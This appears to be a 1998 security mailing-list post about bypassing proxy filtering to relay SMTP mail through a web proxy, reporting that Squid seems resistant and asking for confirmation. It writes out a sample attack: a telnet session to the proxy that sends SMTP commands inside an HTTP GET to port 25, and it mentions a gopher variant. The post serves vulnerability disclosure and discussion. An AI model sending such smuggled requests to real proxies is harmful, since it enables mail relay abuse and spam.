FW: WARNING: By-passing MS Proxy packet filtering

From: Jordan Mendelson <jordy@dont-contact.us>
Date: Fri, 9 Oct 1998 18:53:54 -0400

As far as I can tell, Squid is not vulnerable to this style exploit (to a
point). I was unable to pass a ^J through an HTTP header to get something on
it's own line (required for SMTP "." and anything else which will not allow
:'s).

Can anyone confirm this? Standard attack would look like this:

# telnet squid 3128
GET http://mail.yourhost.com:25/ HTTP/1.0
helo yahoo.com :
mail from: someone@yahoo.com
rcpt to: someone@yourhost.com
data :
:^J.^J

There is a similar gopher attack, however gopher is probably disabled on
everyone's Squid proxy :)

Jordan

--
Jordan Mendelson     : http://jordy.wserv.com